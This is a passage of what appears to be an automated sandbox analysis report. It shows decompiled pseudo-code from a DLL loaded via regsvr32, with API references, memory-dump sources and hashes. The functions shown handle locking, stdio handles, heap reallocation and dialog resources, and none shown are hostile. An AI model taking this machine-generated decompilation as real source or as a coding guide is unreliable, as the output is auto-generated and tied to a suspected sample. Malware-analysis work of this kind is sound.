                                                                        								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
                                                                        								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
                                                                        									goto L28;
                                                                        								}
                                                                        								__eflags =  *(_t79 + 0x27) & 0x00000080;
                                                                        								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
                                                                        									goto L41;
                                                                        								}
                                                                        								goto L28;
                                                                        							} else {
                                                                        								goto L16;
                                                                        							}
                                                                        							while(1) {
                                                                        								L16:
                                                                        								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                        								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                        									break;
                                                                        								}
                                                                        								_t93 = _t93 + 1;
                                                                        								__eflags = _t93 - _t53;
                                                                        								if(_t93 < _t53) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L18;
                                                                        							}
                                                                        							__eflags = _t93;
                                                                        							if(_t93 <= 0) {
                                                                        								goto L5;
                                                                        							}
                                                                        							_t64 = InterlockedExchange(0x1004f5d8, 1);
                                                                        							__eflags = _t64;
                                                                        							if(_t64 != 0) {
                                                                        								goto L5;
                                                                        							}
                                                                        							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                        							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                        								L53:
                                                                        								_t80 = 0;
                                                                        								__eflags = _t93;
                                                                        								if(_t93 < 0) {
                                                                        									L55:
                                                                        									InterlockedExchange(0x1004f5d8, 0);
                                                                        									goto L5;
                                                                        								} else {
                                                                        									goto L54;
                                                                        								}
                                                                        								do {
                                                                        									L54:
                                                                        									_t66 = 0x1004f598 + _t80 * 4;
                                                                        									_t80 = _t80 + 1;
                                                                        									__eflags = _t80 - _t93;
                                                                        									 *_t66 = _t91;
                                                                        									_t91 =  *_t66;
                                                                        								} while (_t80 <= _t93);
                                                                        								goto L55;
                                                                        							}
                                                                        							_t67 =  *0x1004f590; // 0x0
                                                                        							_t43 = _t67 - 1; // -1
                                                                        							_t93 = _t43;
                                                                        							__eflags = _t93;
                                                                        							if(_t93 < 0) {
                                                                        								L49:
                                                                        								__eflags = _t67 - 0x10;
                                                                        								if(_t67 < 0x10) {
                                                                        									_t67 = _t67 + 1;
                                                                        									__eflags = _t67;
                                                                        									 *0x1004f590 = _t67;
                                                                        								}
                                                                        								_t46 = _t67 - 1; // 0x0
                                                                        								_t93 = _t46;
                                                                        								goto L53;
                                                                        							} else {
                                                                        								goto L46;
                                                                        							}
                                                                        							while(1) {
                                                                        								L46:
                                                                        								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                        								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                        									break;
                                                                        								}
                                                                        								_t93 = _t93 - 1;
                                                                        								__eflags = _t93;
                                                                        								if(_t93 >= 0) {
                                                                        									continue;
                                                                        								}
                                                                        								break;
                                                                        							}
                                                                        							__eflags = _t93;
                                                                        							if(__eflags >= 0) {
                                                                        								if(__eflags == 0) {
                                                                        									goto L55;
                                                                        								}
                                                                        								goto L53;
                                                                        							}
                                                                        							goto L49;
                                                                        						}
                                                                        						_t68 =  *((intOrPtr*)(_t92 - 8));
                                                                        						__eflags = _t68 - _v8;
                                                                        						if(_t68 < _v8) {
                                                                        							goto L41;
                                                                        						}
                                                                        						__eflags = _t68 - _t92;
                                                                        						if(_t68 >= _t92) {
                                                                        							goto L41;
                                                                        						}
                                                                        						goto L15;
                                                                        					}
                                                                        					L5:
                                                                        					_t56 = 1;
                                                                        					goto L57;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}
                                                                        0x100147f8
                                                                        0x100147fa
                                                                        0x100147fa
                                                                        0x100147fc
                                                                        0x100147fe
                                                                        0x10014800
                                                                        0x10014814
                                                                        0x10014814
                                                                        0x10014817
                                                                        0x10014819
                                                                        0x10014819
                                                                        0x1001481a
                                                                        0x1001481a
                                                                        0x00000000
                                                                        0x10014802
                                                                        0x10014802
                                                                        0x10014802
                                                                        0x1001480b
                                                                        0x1001480c
                                                                        0x1001480e
                                                                        0x10014810
                                                                        0x10014810
                                                                        0x00000000
                                                                        0x10014802
                                                                        0x10014800
                                                                        0x100147dc
                                                                        0x100147e3
                                                                        0x100147e3
                                                                        0x100147e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147e7
                                                                        0x100147e8
                                                                        0x100147eb
                                                                        0x100147ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147ed
                                                                        0x00000000
                                                                        0x100147e3
                                                                        0x10014765
                                                                        0x10014768
                                                                        0x1001476d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014776
                                                                        0x10014778
                                                                        0x1001477e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014784
                                                                        0x1001478a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014790
                                                                        0x10014792
                                                                        0x1001479b
                                                                        0x1001479f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147a5
                                                                        0x100147a8
                                                                        0x100147aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147b1
                                                                        0x100147b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147b5
                                                                        0x100147b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001472b
                                                                        0x1001472b
                                                                        0x1001472b
                                                                        0x10014732
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014738
                                                                        0x10014739
                                                                        0x1001473b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001473b
                                                                        0x10014836
                                                                        0x10014838
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001484b
                                                                        0x1001484d
                                                                        0x1001484f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014855
                                                                        0x1001485c
                                                                        0x1001488c
                                                                        0x1001488c
                                                                        0x1001488e
                                                                        0x10014890
                                                                        0x100148a4
                                                                        0x100148ab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014892
                                                                        0x10014892
                                                                        0x10014892
                                                                        0x1001489b
                                                                        0x1001489c
                                                                        0x1001489e
                                                                        0x100148a0
                                                                        0x100148a0
                                                                        0x00000000
                                                                        0x10014892
                                                                        0x1001485e
                                                                        0x10014863
                                                                        0x10014863
                                                                        0x10014866
                                                                        0x10014868
                                                                        0x1001487a
                                                                        0x1001487a
                                                                        0x1001487d
                                                                        0x1001487f
                                                                        0x1001487f
                                                                        0x10014880
                                                                        0x10014880
                                                                        0x10014885
                                                                        0x10014885
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001486a
                                                                        0x1001486a
                                                                        0x1001486a
                                                                        0x10014871
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014873
                                                                        0x10014873
                                                                        0x10014874
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014874
                                                                        0x10014876
                                                                        0x10014878
                                                                        0x1001488a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001488a
                                                                        0x00000000
                                                                        0x10014878
                                                                        0x10014704
                                                                        0x10014707
                                                                        0x1001470a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014710
                                                                        0x10014712
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014712
                                                                        0x100146cf
                                                                        0x100146d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ExchangeInterlocked$QueryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2947987494-0
                                                                        • Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                        • Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
                                                                        • Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                        • Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E1001614C() {
                                                                        				void* __ebp;
                                                                        				signed int _t51;
                                                                        				signed int _t55;
                                                                        				long _t59;
                                                                        				signed int _t61;
                                                                        				signed int _t62;
                                                                        				signed int _t64;
                                                                        				signed int _t65;
                                                                        				void* _t69;
                                                                        				signed int* _t78;
                                                                        				signed int _t81;
                                                                        				signed int _t82;
                                                                        				signed int _t84;
                                                                        				signed int _t85;
                                                                        				signed int _t86;
                                                                        				signed char _t89;
                                                                        				signed int _t96;
                                                                        				void* _t99;
                                                                        				int _t101;
                                                                        				void** _t103;
                                                                        				void** _t105;
                                                                        				signed int** _t106;
                                                                        				intOrPtr* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_t51 = E100107B6(0x480);
                                                                        				if(_t51 != 0) {
                                                                        					 *0x1004f920 = _t51;
                                                                        					 *0x1004f90c = 0x20;
                                                                        					_t1 = _t51 + 0x480; // 0x480
                                                                        					_t84 = _t1;
                                                                        					while(1) {
                                                                        						__eflags = _t51 - _t84;
                                                                        						if(_t51 >= _t84) {
                                                                        							break;
                                                                        						}
                                                                        						 *_t51 =  *_t51 | 0xffffffff;
                                                                        						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
                                                                        						 *((char*)(_t51 + 4)) = 0;
                                                                        						 *((char*)(_t51 + 5)) = 0xa;
                                                                        						_t85 =  *0x1004f920; // 0x0
                                                                        						_t51 = _t51 + 0x24;
                                                                        						_t84 = _t85 + 0x480;
                                                                        						__eflags = _t84;
                                                                        					}
                                                                        					GetStartupInfoA(_t110 + 0x14);
                                                                        					__eflags =  *((short*)(_t110 + 0x46));
                                                                        					if( *((short*)(_t110 + 0x46)) == 0) {
                                                                        						L26:
                                                                        						_t81 = 0;
                                                                        						__eflags = 0;
                                                                        						do {
                                                                        							_t86 =  *0x1004f920; // 0x0
                                                                        							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
                                                                        							__eflags =  *_t103 - 0xffffffff;
                                                                        							if( *_t103 != 0xffffffff) {
                                                                        								_t49 =  &(_t103[1]);
                                                                        								 *_t49 = _t103[1] | 0x00000080;
                                                                        								__eflags =  *_t49;
                                                                        								goto L42;
                                                                        							}
                                                                        							__eflags = _t81;
                                                                        							_t103[1] = 0x81;
                                                                        							if(_t81 != 0) {
                                                                        								asm("sbb eax, eax");
                                                                        								_t59 =  ~(_t81 - 1) + 0xfffffff5;
                                                                        								__eflags = _t59;
                                                                        							} else {
                                                                        								_t59 = 0xfffffff6;
                                                                        							}
                                                                        							_t99 = GetStdHandle(_t59);
                                                                        							__eflags = _t99 - 0xffffffff;
                                                                        							if(_t99 == 0xffffffff) {
                                                                        								L40:
                                                                        								_t103[1] = _t103[1] | 0x00000040;
                                                                        							} else {
                                                                        								_t61 = GetFileType(_t99);
                                                                        								__eflags = _t61;
                                                                        								if(_t61 == 0) {
                                                                        									goto L40;
                                                                        								}
                                                                        								_t62 = _t61 & 0x000000ff;
                                                                        								__eflags = _t62 - 2;
                                                                        								 *_t103 = _t99;
                                                                        								if(__eflags != 0) {
                                                                        									__eflags = _t62 - 3;
                                                                        									if(__eflags == 0) {
                                                                        										_t42 =  &(_t103[1]);
                                                                        										 *_t42 = _t103[1] | 0x00000008;
                                                                        										__eflags =  *_t42;
                                                                        									}
                                                                        								} else {
                                                                        									_t103[1] = _t103[1] | 0x00000040;
                                                                        								}
                                                                        								_push(0xfa0);
                                                                        								_push( &(_t103[3]));
                                                                        								_t64 = E10019599(__eflags);
                                                                        								__eflags = _t64;
                                                                        								if(_t64 == 0) {
                                                                        									L30:
                                                                        									_t55 = _t64 | 0xffffffff;
                                                                        									L44:
                                                                        									return _t55;
                                                                        								} else {
                                                                        									_t103[2] = _t103[2] + 1;
                                                                        									goto L42;
                                                                        								}
                                                                        							}
                                                                        							L42:
                                                                        							_t81 = _t81 + 1;
                                                                        							__eflags = _t81 - 3;
                                                                        						} while (_t81 < 3);
                                                                        						SetHandleCount( *0x1004f90c);
                                                                        						_t55 = 0;
                                                                        						__eflags = 0;
                                                                        						goto L44;
                                                                        					}
                                                                        					_t65 =  *(_t110 + 0x48);
                                                                        					__eflags = _t65;
                                                                        					if(_t65 == 0) {
                                                                        						goto L26;
                                                                        					}
                                                                        					_t101 =  *_t65;
                                                                        					_t109 = _t65 + 4;
                                                                        					 *(_t110 + 0x10) = _t101 + _t109;
                                                                        					__eflags = _t101 - 0x800;
                                                                        					if(_t101 >= 0x800) {
                                                                        						_t101 = 0x800;
                                                                        					}
                                                                        					__eflags =  *0x1004f90c - _t101; // 0x20
                                                                        					if(__eflags >= 0) {
                                                                        						L18:
                                                                        						_t82 = 0;
                                                                        						__eflags = _t101;
                                                                        						if(_t101 <= 0) {
                                                                        							goto L26;
                                                                        						} else {
                                                                        							goto L19;
                                                                        						}
                                                                        						do {
                                                                        							L19:
                                                                        							_t69 =  *( *(_t110 + 0x10));
                                                                        							__eflags = _t69 - 0xffffffff;
                                                                        							if(_t69 == 0xffffffff) {
                                                                        								goto L25;
                                                                        							}
                                                                        							_t89 =  *_t109;
                                                                        							__eflags = _t89 & 0x00000001;
                                                                        							if((_t89 & 0x00000001) == 0) {
                                                                        								goto L25;
                                                                        							}
                                                                        							__eflags = _t89 & 0x00000008;
                                                                        							if(__eflags != 0) {
                                                                        								L23:
                                                                        								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
                                                                        								 *_t105 =  *( *(_t110 + 0x10));
                                                                        								_t105[1] =  *_t109;
                                                                        								_push(0xfa0);
                                                                        								_push( &(_t105[3]));
                                                                        								_t64 = E10019599(__eflags);
                                                                        								__eflags = _t64;
                                                                        								if(_t64 == 0) {
                                                                        									goto L30;
                                                                        								}
                                                                        								_t31 =  &(_t105[2]);
                                                                        								 *_t31 = _t105[2] + 1;
                                                                        								__eflags =  *_t31;
                                                                        								goto L25;
                                                                        							}
                                                                        							__eflags = GetFileType(_t69);
                                                                        							if(__eflags == 0) {
                                                                        								goto L25;
                                                                        							}
                                                                        							goto L23;
                                                                        							L25:
                                                                        							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
                                                                        							_t82 = _t82 + 1;
                                                                        							_t109 = _t109 + 1;
                                                                        							__eflags = _t82 - _t101;
                                                                        						} while (_t82 < _t101);
                                                                        						goto L26;
                                                                        					} else {
                                                                        						_t106 = 0x1004f924;
                                                                        						while(1) {
                                                                        							_t78 = E100107B6(0x480);
                                                                        							__eflags = _t78;
                                                                        							if(_t78 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *0x1004f90c =  *0x1004f90c + 0x20;
                                                                        							 *_t106 = _t78;
                                                                        							_t12 =  &(_t78[0x120]); // 0x480
                                                                        							_t96 = _t12;
                                                                        							while(1) {
                                                                        								__eflags = _t78 - _t96;
                                                                        								if(_t78 >= _t96) {
                                                                        									break;
                                                                        								}
                                                                        								 *_t78 =  *_t78 | 0xffffffff;
                                                                        								_t78[2] = _t78[2] & 0x00000000;
                                                                        								_t78[1] = 0;
                                                                        								_t78[1] = 0xa;
                                                                        								_t78 =  &(_t78[9]);
                                                                        								_t96 =  &(( *_t106)[0x120]);
                                                                        								__eflags = _t96;
                                                                        							}
                                                                        							_t106 =  &(_t106[1]);
                                                                        							__eflags =  *0x1004f90c - _t101; // 0x20
                                                                        							if(__eflags < 0) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L18;
                                                                        						}
                                                                        						_t101 =  *0x1004f90c; // 0x20
                                                                        						goto L18;
                                                                        					}
                                                                        				}
                                                                        				return _t51 | 0xffffffff;
                                                                        			}




























                                                                        APIs
                                                                        • GetStartupInfoA.KERNEL32(?), ref: 100161A9
                                                                        • GetFileType.KERNEL32(?), ref: 10016253
                                                                        • GetStdHandle.KERNEL32(-000000F6), ref: 100162D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleInfoStartupType
                                                                        • String ID:
                                                                        • API String ID: 2461013171-0
                                                                        • Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                        • Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
                                                                        • Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                        • Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 54%
                                                                        			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				long _t30;
                                                                        				long _t31;
                                                                        				long _t33;
                                                                        				void* _t36;
                                                                        				long _t38;
                                                                        				long _t41;
                                                                        				long _t42;
                                                                        				long _t44;
                                                                        				long _t46;
                                                                        				void* _t59;
                                                                        				long _t61;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				_push(0x14);
                                                                        				_push(0x10041dc0);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t59 =  *(_t67 + 8);
                                                                        				if(_t59 != 0) {
                                                                        					_t61 =  *(_t67 + 0xc);
                                                                        					__eflags = _t61;
                                                                        					if(__eflags != 0) {
                                                                        						__eflags =  *0x10050a64 - 3;
                                                                        						if( *0x10050a64 != 3) {
                                                                        							while(1) {
                                                                        								_t28 = 0;
                                                                        								__eflags = _t61 - 0xffffffe0;
                                                                        								if(_t61 <= 0xffffffe0) {
                                                                        									__eflags = _t61;
                                                                        									if(_t61 == 0) {
                                                                        										_t61 = 1;
                                                                        										__eflags = 1;
                                                                        									}
                                                                        									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
                                                                        								}
                                                                        								__eflags = _t28;
                                                                        								if(_t28 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags =  *0x1004f58c; // 0x0
                                                                        								if(__eflags == 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								_t30 = E10014676(_t61);
                                                                        								__eflags = _t30;
                                                                        								if(_t30 != 0) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L36;
                                                                        							}
                                                                        							goto L37;
                                                                        						} else {
                                                                        							goto L5;
                                                                        						}
                                                                        						do {
                                                                        							L5:
                                                                        							 *(_t67 - 0x1c) = 0;
                                                                        							__eflags = _t61 - 0xffffffe0;
                                                                        							if(_t61 > 0xffffffe0) {
                                                                        								L25:
                                                                        								_t28 =  *(_t67 - 0x1c);
                                                                        								__eflags =  *(_t67 - 0x1c);
                                                                        								if( *(_t67 - 0x1c) != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags =  *0x1004f58c; // 0x0
                                                                        								if(__eflags == 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L27;
                                                                        							}
                                                                        							E10013A38(0, _t59, 4);
                                                                        							 *(_t67 - 4) = 0;
                                                                        							_t33 = E10013B9B(_t59);
                                                                        							 *(_t67 - 0x20) = _t33;
                                                                        							__eflags = _t33;
                                                                        							if(_t33 == 0) {
                                                                        								L21:
                                                                        								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                                                                        								E100124B7();
                                                                        								__eflags =  *(_t67 - 0x20);
                                                                        								if( *(_t67 - 0x20) == 0) {
                                                                        									__eflags = _t61;
                                                                        									if(_t61 == 0) {
                                                                        										_t61 = 1;
                                                                        										__eflags = 1;
                                                                        									}
                                                                        									_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                        									__eflags = _t61;
                                                                        									 *(_t67 + 0xc) = _t61;
                                                                        									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
                                                                        								}
                                                                        								goto L25;
                                                                        							}
                                                                        							__eflags = _t61 -  *0x10050a50; // 0x0
                                                                        							if(__eflags <= 0) {
                                                                        								_push(_t61);
                                                                        								_push(_t59);
                                                                        								_push(_t33);
                                                                        								_t41 = E1001409B();
                                                                        								_t68 = _t68 + 0xc;
                                                                        								__eflags = _t41;
                                                                        								if(_t41 == 0) {
                                                                        									_push(_t61);
                                                                        									_t42 = E1001437A();
                                                                        									 *(_t67 - 0x1c) = _t42;
                                                                        									__eflags = _t42;
                                                                        									if(_t42 != 0) {
                                                                        										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                        										 *(_t67 - 0x24) = _t44;
                                                                        										__eflags = _t44 - _t61;
                                                                        										if(_t44 >= _t61) {
                                                                        											_t44 = _t61;
                                                                        										}
                                                                        										E10011440( *(_t67 - 0x1c), _t59, _t44);
                                                                        										_t46 = E10013B9B(_t59);
                                                                        										 *(_t67 - 0x20) = _t46;
                                                                        										_push(_t59);
                                                                        										_push(_t46);
                                                                        										E10013BC6();
                                                                        										_t68 = _t68 + 0x18;
                                                                        									}
                                                                        								} else {
                                                                        									 *(_t67 - 0x1c) = _t59;
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t67 - 0x1c);
                                                                        							if( *(_t67 - 0x1c) == 0) {
                                                                        								__eflags = _t61;
                                                                        								if(_t61 == 0) {
                                                                        									_t61 = 1;
                                                                        									__eflags = 1;
                                                                        									 *(_t67 + 0xc) = 1;
                                                                        								}
                                                                        								_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                        								 *(_t67 + 0xc) = _t61;
                                                                        								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
                                                                        								 *(_t67 - 0x1c) = _t36;
                                                                        								__eflags = _t36;
                                                                        								if(_t36 != 0) {
                                                                        									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                        									 *(_t67 - 0x24) = _t38;
                                                                        									__eflags = _t38 - _t61;
                                                                        									if(_t38 >= _t61) {
                                                                        										_t38 = _t61;
                                                                        									}
                                                                        									E10011440( *(_t67 - 0x1c), _t59, _t38);
                                                                        									_push(_t59);
                                                                        									_push( *(_t67 - 0x20));
                                                                        									E10013BC6();
                                                                        									_t68 = _t68 + 0x14;
                                                                        								}
                                                                        							}
                                                                        							goto L21;
                                                                        							L27:
                                                                        							_t31 = E10014676(_t61);
                                                                        							__eflags = _t31;
                                                                        						} while (_t31 != 0);
                                                                        						goto L36;
                                                                        					} else {
                                                                        						_push(_t59);
                                                                        						E100107C8(0, _t59, _t61, __eflags);
                                                                        						L36:
                                                                        						_t28 = 0;
                                                                        						__eflags = 0;
                                                                        						goto L37;
                                                                        					}
                                                                        				} else {
                                                                        					_t28 = E100107B6( *(_t67 + 0xc));
                                                                        					L37:
                                                                        					return E1001254F(_t28);
                                                                        				}
                                                                        			}

















                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                        • Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
                                                                        • Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                        • Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				intOrPtr _v16;
                                                                        				signed int _v20;
                                                                        				void* _t59;
                                                                        				signed int _t61;
                                                                        				signed int _t62;
                                                                        				void* _t64;
                                                                        				int* _t72;
                                                                        				struct HWND__* _t73;
                                                                        				intOrPtr _t78;
                                                                        				struct HRSRC__* _t81;
                                                                        				void* _t82;
                                                                        				void* _t86;
                                                                        				void* _t88;
                                                                        				void* _t89;
                                                                        				intOrPtr _t90;
                                                                        				void* _t93;
                                                                        				intOrPtr _t95;
                                                                        				intOrPtr _t101;
                                                                        				intOrPtr _t103;
                                                                        				struct HINSTANCE__* _t105;
                                                                        				intOrPtr* _t106;
                                                                        				void* _t107;
                                                                        
                                                                        				_t106 = __ecx;
                                                                        				_v8 = 0;
                                                                        				_v12 = 0;
                                                                        				if(_a8 != 0) {
                                                                        					_t105 =  *(E100373B5() + 0xc);
                                                                        					_t81 = FindResourceA(_t105, _a8, 0xf0);
                                                                        					if(_t81 != 0) {
                                                                        						_t82 = LoadResource(_t105, _t81);
                                                                        						_v12 = _t82;
                                                                        						if(_t82 == 0) {
                                                                        							return 0;
                                                                        						}
                                                                        						_v8 = LockResource(_t82);
                                                                        					}
                                                                        				}
                                                                        				__eflags = _v8;
                                                                        				_t86 = _a4;
                                                                        				_t103 = _a12;
                                                                        				_v16 = 1;
                                                                        				if(_v8 != 0) {
                                                                        					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
                                                                        					__eflags = _v12;
                                                                        					_v16 = _t78;
                                                                        					if(_v12 != 0) {
                                                                        						FreeResource(_v12);
                                                                        					}
                                                                        				}
                                                                        				_t59 =  *(_t86 + 0x48);
                                                                        				__eflags = _t59;
                                                                        				if(_t59 == 0) {
                                                                        					L25:
                                                                        					return _v16;
                                                                        				} else {
                                                                        					_t88 =  *(_t59 + 0x40);
                                                                        					_a8 = _a8 & 0x00000000;
                                                                        					__eflags = _t88;
                                                                        					_a4 = _t88;
                                                                        					_v12 = _t88;
                                                                        					if(_t88 != 0) {
                                                                        						_a8 =  *(E10006D96( &_a4));
                                                                        					}
                                                                        					_t61 = 0;
                                                                        					__eflags =  *(_t103 + 8);
                                                                        					_v8 = 0;
                                                                        					if( *(_t103 + 8) > 0) {
                                                                        						do {
                                                                        							_t89 = _a8;
                                                                        							__eflags = _t89;
                                                                        							if(_t89 == 0) {
                                                                        								L17:
                                                                        								_t90 =  *((intOrPtr*)(_t103 + 0xc));
                                                                        								_t62 = _t61 << 3;
                                                                        								__eflags =  *(_t62 + _t90);
                                                                        								_v20 = _t62;
                                                                        								if( *(_t62 + _t90) != 0) {
                                                                        									_t107 = E1001F77E(0xc);
                                                                        									__eflags = _t107;
                                                                        									if(_t107 == 0) {
                                                                        										_t107 = 0;
                                                                        										__eflags = 0;
                                                                        									} else {
                                                                        										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
                                                                        										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
